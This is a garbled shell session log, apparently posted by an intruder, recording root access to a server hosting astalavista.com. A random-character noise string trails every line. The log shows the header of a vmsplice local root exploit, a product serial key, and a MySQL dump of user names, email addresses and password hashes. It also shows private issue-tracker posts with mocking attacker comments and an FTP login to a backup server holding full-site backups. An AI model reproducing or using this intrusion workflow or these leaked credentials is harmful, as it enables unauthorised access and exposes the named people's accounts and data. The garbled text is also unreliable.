( S# H: I* s/ J% j1 N-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
# H; A8 L( a. |- a( t8 }-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout% T! c/ }+ K }! ~1 w5 d
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
6 m1 ~5 G( b: Y8 f- f-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
S: T2 t& m: F- h3 @- Ldrwx–x–x 3 com com 4096 Jan 29 2008 domains
; g+ Q* f# @: I, _4 Z-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed3 o) B* R( D2 v. ~1 c! Y
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap" D. C% Q0 R, D* X' }, ? O* I/ J
-rw——- 1 com com 69 Nov 18 2008 .lesshst' f8 I3 a4 @/ l
drwx—— 2 com com 4096 Sep 24 2007 mail
: T& h5 y+ e* c/ A1 p-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history2 }- ^" }) t( y! \
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp* V7 B7 x" p& f4 _- ~ S( J
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
0 @8 M2 O, `: I$ c5 k- v; l-rw-r—– 1 com mail 34 Sep 24 2007 .shadow$ ~2 }+ c. `2 f
drwx—— 2 com com 4096 Aug 26 2008 .ssh1 P8 Q! M7 K% G3 x; Z9 l: P) u
-rwx—— 1 com com 8515 Feb 10 2008 t
$ H! O" l; K# J" l o, y-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
0 n' t% G5 |" odrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp8 p* q, U4 O0 ?# P9 m9 N( P8 D7 ?
-rw-rw-r– 1 com com 617 May 20 2008 .toprc: P! \2 I' r" u
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql8 ]0 p! f7 ?, Y8 @8 v
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
* I2 t- `: `9 q0 Z8 d0 z* |-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc2 ^* Y' k5 f2 \7 H5 m
9 \( G; m/ [& |* G: Bsh-3.2# head t.c
# P" r& E1 P, M% s5 ` P J) `/*" q6 a+ A9 E4 g0 ?+ U, W
* jessica_biel_naked_in_my_bed.c4 q6 [. i/ {7 D D2 X% |
*1 X# S! g1 ^) P; p6 h
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
# r, ?$ z+ l5 d. n0 h* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.% x, T: p( x( v" p7 ~! E
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
) k2 W8 g% w) F( K) D, ^*
1 E! b" j1 [; ^* p* Linux vmsplice Local Root Exploit. K4 E6 }" \5 U& j7 z
* By qaaz
& Q- k$ b5 `7 L* V*+ q+ j2 D: w/ g! ~
5 r, C4 s# `( Y# r2 @' }2 r {
sh-3.2# cd /
I, @; Z% i" d/ ish-3.2# ls -la) X( O/ C3 u6 l8 b3 M! u* F4 {& E
total 360
. k+ X$ `# n$ xdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
! ]8 [% P5 z1 y3 g% k% {3 Fdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
" Z6 n% N+ R6 P! h3 Y-rw——- 1 root root 10240 Jun 3 02:39 aquota.group7 r( I$ P, V: K. \& a4 @
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user9 t; o. J# u- q
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db2 j8 r# C6 C2 n4 }; Q1 U
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
5 o% {# a. L* Q1 w-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
% H: X8 I7 }& g; ]% t7 adrwxr-xr-x 3 root root 4096 Dec 29 2007 backup# E+ [/ E+ T6 \
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
" m( p5 T7 T2 B; Z& o$ v6 q% W) Adrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot8 @0 B+ ], u% M# A
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev8 k2 a. D; a4 r0 E2 m) f
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
- P! y- I e$ @) T& F6 E( Bdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home! l; m3 R* w* v: x. h
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf C) d8 t1 b; E# D: j8 c5 r8 [" |
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib2 U4 e8 X+ w1 K. y- a
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64) A) q g7 z* _8 W) s! |. Q
drwx—— 2 root root 16384 Sep 11 2007 lost+found0 V3 e' d* S f1 h* P5 b+ X: e0 i
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media) \3 p [! {7 l: O, \
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
v- U" E1 L" [# |, i: ^! F: edrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt3 K+ I' P$ s& d
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg% u$ G, Y. k' _/ E: R$ Q; L! K
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
0 }$ T: t/ N! ^+ ndrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt/ f; H6 r: Y* O% \5 l5 J8 q3 n
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
( |, u4 @, s' p' z: J+ Q9 Qdrwxr-x— 15 root root 4096 Jun 4 08:40 root
: }, u9 [! W- H7 K/ s1 `0 s. Vdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin1 C+ K' d6 s1 g; u) @* E$ A
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux. l* {7 N- d( }% Z
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv$ d: C& _& O9 w! R" j+ J( |
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys% A: V# b* q9 \. B8 ~
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
; q P M4 ^5 xdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr! X& W: Y$ r7 a. b+ D
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var9 d4 n2 U3 w- a8 E4 a
/ F/ N r! o& ish-3.2# cd opt O1 F- g7 F. p+ a1 c- ?) p4 m
sh-3.2# ls -la
; M2 N! K7 X# ~) ?: qtotal 20% T, N8 a0 G3 u7 H& h
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .2 I4 ~6 t: x& u8 b: ~
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..2 d4 f8 U0 H6 l/ b3 f1 H4 O: @
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws: k$ {0 c" B! V7 Q
& L$ z/ y: u* w6 p* f! j6 N) T! g
sh-3.2# cd lsws/
- l" X3 K9 H* w9 O0 M* T: nsh-3.2# ls -la- s/ Z+ o$ U6 B
total 1088 ?; O! O5 E* t& a) p! a
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
$ V; b: h3 a4 B2 ?. Y/ F ^drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..) Y5 l9 w! B/ G! e" W4 u3 l9 y
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons7 r, u8 ~) G% M2 S: U8 o' |
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
) S+ z3 ]! R- M- D, C. w1 A7 Sdrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
; q ^% `7 Q" Mdrwxr-xr-x 2 root root 4096 May 29 15:10 bin/ E1 a5 o: g0 j; x2 A. N/ ]
drwx—— 4 apache apache 4096 Jun 3 02:43 conf1 i3 k- M) e2 s; O8 d- H9 F/ f. A) q
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
; k/ p% N2 V- Cdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs8 w9 a- C; X' x2 e& q0 y
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
' s7 }" m( X# i: ]; I, Adrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
% W! d4 @% ?0 x' n* T Z-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
* |$ k) B! X. I-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP% @6 r- l* @6 Y6 ?' U$ |* ]
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL H$ [% [% z9 ]2 _
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP. |* z( ?1 J+ V. ]8 s7 C
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
" u0 k; P, w9 n8 ^3 k2 q' p9 Qdrwxr-xr-x 2 root root 4096 Mar 20 2008 php7 j6 n9 t) P3 c" H2 n. r
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild" f- _5 ^5 l9 X0 ^8 u4 u
drwxr-xr-x 3 root root 4096 Mar 20 2008 share7 e5 G, v0 Q( c3 @. i
-rw-r–r– 1 root root 6 May 29 15:10 VERSION" p5 {1 H9 a8 Q3 y
) s9 B3 g" N, M8 U" y4 R
sh-3.2# cd conf2 X/ d2 m/ n* Y7 B& ]! A
sh-3.2# ls -la
9 {$ v: i: h+ V/ w' ftotal 48
9 ^# y; g5 ~3 Idrwx—— 4 apache apache 4096 Jun 3 02:43 .6 ^, [! q6 C5 L% U- ^- {( O
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
: P" z% `9 w, Fdrwx—— 2 apache apache 4096 Mar 20 2008 cert: d" J4 _' I6 P5 r7 a9 V
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml: [- _& W; k$ a. C6 ~% E& d/ f
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
' N* s. S# N# ?4 t/ r-rw-r–r– 1 root apache 0 Jun 3 14:11 .last( H4 G# U* ?* g& s
-rw——- 1 apache apache 256 May 29 15:10 license.key
9 O* X1 I4 X9 y$ G: d2 H* f2 O-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
+ t1 D4 I) i$ ]3 Q8 p, O* |# {-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
4 [- E4 N! N0 a; j-rw——- 1 apache apache 20 May 29 15:10 serial.no% Q- s2 l" _6 U8 P
drwx—— 2 apache apache 4096 Mar 20 2008 templates
, w3 Y. |* x- Q3 V
8 Z% U3 A6 R9 e6 O6 W' @sh-3.2# cat serial.no- w" p, t! d! W% l
IbDl-oVsO-CKqL-wVRa+ ?! c( E; y! [9 T8 e
' w3 W7 T# K( hsh-3.2# mysql
6 A( V& \( k- g8 wWelcome to the MySQL monitor. Commands end with ; or \g., ]* N. w8 r* i/ T( `6 Y1 c, Y* m
Your MySQL connection id is 286844
! `, D$ l. d8 g# wServer version: 5.0.45-community-log MySQL Community Edition (GPL)
9 F; Y& s2 o2 _/ L( p: h- \+ ]: z- Q
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
' i3 r. j* {- m, o4 L2 S6 E! m2 h( N6 C, i2 g' b) d
mysql> show databases;
! b8 G1 z8 Z9 f( R, ^: W+———————–+
6 S3 F+ C4 E: I5 ^& ? ~ ~) @5 n( S6 e| Database |- s: V) V+ P6 d, Y$ w
+———————–+
, J% E8 V- h: _| information_schema |
4 Z$ Z' g( h2 @( r| astanet_ads |! m% O" E; X# N# ~5 X
| astanet_mailing_lists |
. H2 N7 B% c0 [5 q: t0 Z- `| astanet_mediawiki |% G4 i) m$ x2 v: U. Q( h
| astanet_membersystem |+ Q1 o/ e: Z4 x s6 t
| com_contrexx |3 A+ ]: d& W8 h8 h$ r6 Y
| com_contrexx2 |
8 Y3 ~% y6 s& s3 K0 ~" M| com_contrexx2_live |. L; Y" z. n8 T: E
| da_roundcube |
* C# R" E) G2 q8 c$ || dolphin |
' D2 x' u% X4 w( g' b" t| ideapool |7 L3 {7 t, u4 C1 W! X0 @4 ]; l7 H
| mysql |- K& R1 o+ [* ]: I- V1 Z
| test |# i( Z; K; N" B% Q. ]+ S
| yourmaster |
' Q7 D: b" X% I8 G8 q4 D+———————–+
2 P. o) Z- K8 Y# }14 rows in set (0.00 sec)* _: \. G( X8 Y
5 R" b; P6 l: }2 |$ x5 u0 |' ~
mysql> use ideapool8 U5 v# D- q" c# O% r9 b5 }! M P' E, Q
Database changed
" z5 F! g' H3 z1 q imysql> show tables;, c6 I5 n' x5 F4 t# G! \! P+ Q
+———————————–+. T1 s& Q q! K! L1 Z
| Tables_in_ideapool |; A4 o2 O5 B6 `6 Q: }, X
+———————————–+: x( W+ K" ` N$ z
| eventum_columns_to_display | L$ F0 T! n/ v9 \: {+ ~
| eventum_custom_field |
+ o7 j3 D3 Q( a$ Z; ?: v| eventum_custom_field_option |8 t% f, Q2 n2 n- y
| eventum_custom_filter |
2 K+ m1 L7 l' N* b| eventum_customer_account_manager |
( K( A/ V" D1 C9 B. W| eventum_customer_note |
& Y) D o8 D3 Z* ] ?| eventum_email_account |
4 H3 Z, [2 N6 w| eventum_email_draft |
6 | s& ]$ |( [' g| eventum_email_draft_recipient |
- Q2 m1 q, s) ?4 \; ?| eventum_email_response |
6 k" [; s }. [| eventum_faq |
: l, k+ e! w: Q* h| eventum_faq_support_level |# S8 m, Y# H3 _; ]5 ]# r' y+ t
| eventum_group |# S' @ O5 e3 F1 r4 \/ W4 r' ?
| eventum_history_type |1 s% T7 |: k" k
| eventum_irc_notice | \7 E3 u) K0 D3 @, `9 d
| eventum_issue |) T7 b3 ~+ R0 u
| eventum_issue_association |
- L9 V) i b; R4 v$ L| eventum_issue_attachment |
7 ` i8 S) B+ || eventum_issue_attachment_file |
" k; y; Q. L( A& m| eventum_issue_checkin |! M- r& M4 i `, {4 S# u* b
| eventum_issue_custom_field |& J7 e+ y. U' K* y8 M- S
| eventum_issue_history |
6 R' @. Y/ I7 j/ L/ \; f4 |/ [| eventum_issue_quarantine |
4 P8 @3 `" T' T4 {5 B D| eventum_issue_requirement |
. S) d0 _5 A; y t u# v. _" y. {! _/ d| eventum_issue_user |% U! F& m0 A( a- u$ t u
| eventum_issue_user_replier |
! j& O4 C# F" n+ |* C# G1 T| eventum_link_filter |
& h, H9 x" _# Z& q: h| eventum_mail_queue |3 M; m) E' D' l
| eventum_mail_queue_log |
A ~% P4 s* R% L: Y# c| eventum_news |+ B- t& R O) R: H" X A
| eventum_note |: B' A6 j) ]- r& w2 z F# P. O5 l
| eventum_phone_support |1 D2 O0 a, l) h/ q3 d
| eventum_project |& c9 `* S% v1 k& R3 G! |
| eventum_project_category |. w! I" ]% u$ p- ~+ {! d
| eventum_project_custom_field |# N# O9 `4 L- `
| eventum_project_email_response |
) W9 b: U# ~* C- M7 G6 U+ }| eventum_project_field_display |: I4 o1 ]- u2 _ v& B- l; G5 S
| eventum_project_group |
: B9 x! s0 V ]: ~; K| eventum_project_link_filter |1 S" s& z1 w" Y" f E, p' e6 A
| eventum_project_news |
9 d$ I7 k- M; o; c8 }# w( J' {| eventum_project_phone_category |% }# e9 [ f; y6 l! ^6 V- Y
| eventum_project_priority |( U" l! d4 D- f% s8 G* w
| eventum_project_release |
0 l, Q2 X- U, e# f3 s- s+ \| eventum_project_round_robin |0 G3 m8 ^: @1 t+ D
| eventum_project_status |
3 ]+ r4 a: e; s# C3 O| eventum_project_status_date |' d. H* E; G; h) j# ]7 D
| eventum_project_user |
5 ?0 P# T& W* V7 a. B, j+ W| eventum_reminder_action |2 ]' O& K2 z/ R4 J" c D2 f
| eventum_reminder_action_list |- W( S; x# J* _
| eventum_reminder_action_type |
: ?/ W( _( q% e| eventum_reminder_field |0 W# U# _$ }# p) M; Q
| eventum_reminder_history |8 ?: T) O$ P3 v
| eventum_reminder_level |# X- t, p! Y, c# Z% u: o; t
| eventum_reminder_level_condition |
3 r v' S) m& W$ U| eventum_reminder_operator |* ]; a2 h% c! l2 H$ N; T
| eventum_reminder_priority |5 ]" O' Q6 d% S! d1 W& V
| eventum_reminder_requirement |0 p) i, A& Y0 I. @, B
| eventum_reminder_triggered_action |! V9 F' E9 q2 c, ^
| eventum_resolution |7 e3 W. S7 }) S% i" |6 W, a, `6 y3 C
| eventum_round_robin_user |, @+ K0 I6 l# G8 X6 ?; S, ]( q
| eventum_search_profile |4 b' T6 r- _8 L) X, V$ Q
| eventum_status | p, J1 C- K# c( ]. q
| eventum_subscription |' H7 b! V% G1 {6 r4 c
| eventum_subscription_type |
+ Q+ D( A) T0 g| eventum_support_email |0 l( E; D8 _8 K1 n1 f& W
| eventum_support_email_body |
/ D( V: f7 s. w- w1 c| eventum_time_tracking |
9 j J$ i$ j3 }9 k& S7 W! ^* [| eventum_time_tracking_category |
' [3 ~5 \: p( @4 b) X' r3 n/ n| eventum_user |
7 w/ X+ f! q. M- ^! {+ Y+———————————–+
3 f# C$ s* Z6 k3 ]# Y/ D2 @0 U69 rows in set (0.00 sec); A" A& @1 m6 h& C
; f$ A" {# D! R$ x
mysql> describe eventum_user;2 z, Y$ d; t2 q$ S( n7 O
+————————-+——————+——+—–+———————+—————-+
* U; m- z5 M' G$ v3 C- g- u| Field | Type | Null | Key | Default | Extra |0 a( i9 o* Q6 g4 |
+————————-+——————+——+—–+———————+—————-+& P4 \$ z( R$ s9 S0 t8 b q2 J" o
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
- B0 v; s1 b; [| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
7 R3 K+ S7 b' `: x% B| usr_customer_id | int(11) unsigned | YES | | NULL | |
, H' g& h# s3 I, s, K| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |* n- c" v& d% S
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
# `0 f9 W" k0 S! `( P4 N| usr_status | varchar(8) | NO | | active | |" t8 r: v2 c8 N
| usr_password | varchar(32) | NO | | | |
3 ]5 m+ K3 c4 X& d* H6 o& d| usr_full_name | varchar(255) | NO | | | |
2 x, |# H! L ~: S; y& A* u| usr_email | varchar(255) | NO | UNI | | |3 t% y2 y2 m+ F* a, V0 N
| usr_preferences | longtext | YES | | NULL | |, w1 W. n" |# u
| usr_sms_email | varchar(255) | YES | | NULL | |
C: c: V3 @ I- h| usr_clocked_in | tinyint(1) | YES | | 0 | |" q; V4 G7 t: F6 s5 [1 l
| usr_lang | varchar(5) | YES | | NULL | |( ]' s$ ~! d/ D- Z; W* @! m8 Y
+————————-+——————+——+—–+———————+—————-+4 m3 e h# f1 H9 S C
13 rows in set (0.00 sec)3 g$ f, F/ j" B5 v \8 C$ h
" E' T/ a2 O+ P1 B+ bmysql> select usr_full_name,usr_email,usr_password from eventum_user;/ ]$ C* h9 q! O7 v3 m' h
+———————-+——————————-+———————————-+( g6 [. B8 g7 o- n: i: }2 k
| usr_full_name | usr_email | usr_password |5 x8 W& O3 {0 E7 _
+———————-+——————————-+———————————-+
/ X' D# l5 [1 T; j, m| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |* b& b2 Q; x. U7 C% V* v4 V
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |5 t* T3 | V+ @0 m" q: y# G' x
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |: r8 z& ^4 f0 i& J7 e% ^
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |& @/ S+ K3 B6 G9 r
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |. E& H$ m$ z1 N; t7 U
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
5 X, t: h- h7 E5 U/ N5 o| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |# {( }! y% B5 s {
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |) [ y8 x1 |# {
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
; \; y) c; l/ h; w| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
5 @% p- {2 E3 B% ]( D| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |9 V9 f6 f- G) u' ?+ ^
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |6 A" i+ J, S4 j6 M8 O
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
; g- }) o/ \5 b1 j| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
. [% r9 P! B/ i* I| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
0 D: J0 E b6 d! Z" M8 g2 t }+———————-+——————————-+———————————-+0 J. U* d, Z% B8 m
15 rows in set (0.00 sec)
3 W2 j6 B6 X( d. U; B: p5 T7 ~, S! i0 ~: g
mysql> select iss_description from eventum_issue where iss_id = 43;9 I& K% W" J0 z+ t. e x2 X
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+9 A$ K0 X& u5 N+ p6 {9 y
| iss_description
U# l1 S6 v7 E/ ~7 F7 @|" t5 g1 j! E% _1 q
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+8 ^! J# F7 Y% ]/ {' @- S0 `
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
- W6 U6 w% [! M& @1 U8 t+ Vconnected for 90 mins… 120mins… so what i propose is something like:
# t' P: P& k4 S; |. A8 Z链接标记[url]http://www.surfthechannel.com/[/url]1 F) z5 Z( l+ F: b% p: j( q
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system1 E! W: U+ \5 P* M6 r B
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
: c I; H% x. D( i! \5 X" L+ @. Q" Nbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off- Q$ y. t3 Z& C ^4 Z
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…5 n# [0 |8 [" Y6 q" g2 J
5 x, a) T* `7 N. TWe could also put advertisement during play on the flash video player itself… extra $$…# w! {6 a6 `$ \+ z4 P! L! T( Z& }% e
; }( r8 z& A( v- R
By sykadul |
2 _2 z/ G1 { Z5 f/ e5 w' X8 g; Z2 \+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
% r. g; L" r4 T E2 h8 X1 row in set (0.00 sec)% V7 ]& A& H) Z
c7 Q* T: r1 ]* k' S// Money and extra $$ is all they care about. remember that.
% G( l1 ]% k8 p1 n! b
5 c% U: }9 O2 r, {5 [6 N2 E7 d$ Zmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
1 n) n. A/ g. l3 h2 G: z+————————+——————————————————————————————————————————————————————————————————————————————-+0 V* }* G( Q# u" I( C' G+ b
| iss_summary | iss_description
; L2 d" g8 e% q; b' ]|
* t# y$ W9 c( G. O+————————+——————————————————————————————————————————————————————————————————————————————-+
9 P+ e+ |0 e4 y0 X! l5 N `| Forum for REAL EXPERTS | Hello,
- a- c( r7 E+ J
6 R7 Z) f( t$ t7 k QIshtus and I, K7 u) m3 S, B* s* {+ s. u
9 z6 G2 p3 _, ?4 wCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide9 ^+ J, i- r; o7 P7 r6 L
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..3 ~: s8 D' t+ \1 _' J
4 L# q4 l3 R& |1 ?# o2 ], R- Z" p% L
One example a friend of mine from coresecurity.com!
- u3 _9 y X6 N
/ ]# Q0 c1 S1 ]8 v# j: xWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
. E* J7 z3 k0 n; c) ~
: y" G6 R. _4 j, G|/ @( @3 J: G/ q5 E! N
+————————+——————————————————————————————————————————————————————————————————————————————+
$ v L) M' q/ I- u7 \: B5 r) a7 {1 row in set (0.00 sec)" S2 o( \+ {' U3 @+ ?
{5 O% J5 {+ [1 C: X9 i- L9 w// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…4 U% i7 @6 U j1 | \
5 b; L8 r h2 `6 i1 c6 k
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;0 b- X/ t! i3 w, N3 J
+——————+———————————————————————————————+$ K( O1 p8 b+ L0 h% V
| iss_summary | iss_description |
2 Z' L/ j. o" b! u2 z* O. m. [+——————+———————————————————————————————+
1 Q8 g! ]6 X/ V8 i9 D, W5 i6 M| Website guidance | Virtual Girl which guides you trought the website.
2 w5 i5 a3 O( f, R% C: _0 }( h% s# |# r4 v
We need a girl with who you can ( talk )!!!3 P _( @# A% v
Also for the News!+ R7 P$ ]. m1 k5 Y6 i, L
So my suggestion is a girl who read you the news loud if you like!2 l2 n! f: M. [ J
you can choose between read yourselfe or she read it for you or both!
8 a. \" v" J; e0 K( M- l. E; a4 y( d H7 P) z- Z ~$ T4 q) l6 E
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
) k6 n" J& H- a1 O7 n3 A. n, p4 n4 s- p; @
Have a look on the example girls!!
) s* [2 ?, ?: G i8 g: Z0 f. a4 H/ y( y
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
: W' @+ U, W5 \3 S
# K9 N4 _. H1 _6 wor that6 Y+ `$ w: }2 N' T$ ?' \8 @# Z
2 Q8 j! q0 c2 g8 I. d- s% T
链接标记[url]http://www.yellostrom.de/[/url]
3 O& g; [& o9 m6 o5 v8 \
& c5 z) m9 C6 h& O8 U$ v4 ]|
! ~2 D+ m% S4 @5 ?) j# l- y+——————+———————————————————————————————+
( Z3 Q( P- R( `) C1 row in set (0.00 sec)
7 X3 e0 z+ C. G* Q4 [! }- D9 s, }$ R9 s
// ha ha.: T# C3 E* M7 ]$ ^
9 f2 O, b4 F$ I. L; F' K# T
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;2 t& L5 p# K3 w/ D; |4 q
+————————–+———————————————————————————————————–+
& M) j# Z5 p% j! w6 }! \1 \. M| iss_summary | iss_description |
+ q1 y& l" q0 @% H/ z! W' s+————————–+———————————————————————————————————–+
; j, h3 v) i! l| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |+ j, b3 g2 Q% c% q0 G
+————————–+———————————————————————————————————–+9 p T5 u: Q& v$ Y O+ P- ?( m
1 row in set (0.00 sec)9 G \6 i& H1 X, }
9 o3 _" }# n: U( B7 }: e- n1 }
// LOL.9 b- r, `7 {: Y) m/ a
l1 t' T% B- dmysql> exit, H! d. N0 L- ^* f
Bye
4 ]& y) t* B) m9 b% S i* X, r$ G! R, Q
sh-3.2# ftp 212.254.194.163* j! F% D3 T: ?6 \8 n5 w- u2 s; e
Connected to 212.254.194.163.
6 t9 G4 R( k+ q4 @. ^2 M4 N0 h220 BackupCOM_VW FTP server ready.
5 ^) I$ x0 M2 m9 O& F% h; P504 AUTH: security mechanism ‘GSSAPI’ not supported.6 ?" o+ M6 V% c o. m/ Z2 n
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.) m8 c" D. @# W8 M! a& W8 q
KERBEROS_V4 rejected as an authentication type9 n2 R/ H+ b- p- ?3 k
Name (212.254.194.163:root): astalavista.com
: I" N' `6 R0 o8 M1 f' S2 Z. ~7 h331 Password required for astalavista.com.
3 _# P4 s, A. C- p+ h$ y7 M6 d5 n2 CPassword:: Q' ]& P x; e+ W* {, }, r
230 User astalavista.com logged in.1 Y5 F( }: L+ d
Remote system type is UNIX.4 ]3 t, D: ? N
Using binary mode to transfer files.3 p8 \6 e k9 m3 Y5 C
ftp> ls -la
6 }; [6 R. w6 r4 v) h2 R2 ]' q227 Entering Passive Mode (212,254,194,163,2,188)
. t* B: p3 ~; Y9 n9 |150 Opening BINARY mode data connection for ‘file list’.2 z; a" |/ t& j$ O& i) e
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
1 E( A2 ?0 ?0 {0 O. \; M h" m226 Transfer complete.0 n$ V! ]0 N/ @* I. o. a" H
ftp> cd astalavista.com0 O+ N* L" b5 q, j9 [' v
250 CWD command successful.
9 X) h/ e0 I2 j1 t& k* D$ V& Mftp> ls -la: a% y1 K* y1 d) h- R% t! S8 z
227 Entering Passive Mode (212,254,194,163,2,189)
! f0 b( ]! { I1 ~) i& B# A% H9 S150 Opening BINARY mode data connection for ‘file list’.7 D* e$ u" O+ U7 j+ \
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
7 I+ m/ @* l; P& `0 r2 v-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2 P6 S) t4 ]$ \; L$ {
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2& Z, G# p5 A8 h& C4 u Z3 D( K! R
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar4 |0 C1 b7 K6 v3 H( S* d) F
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar9 t" o! v! V5 L0 Z. [( p
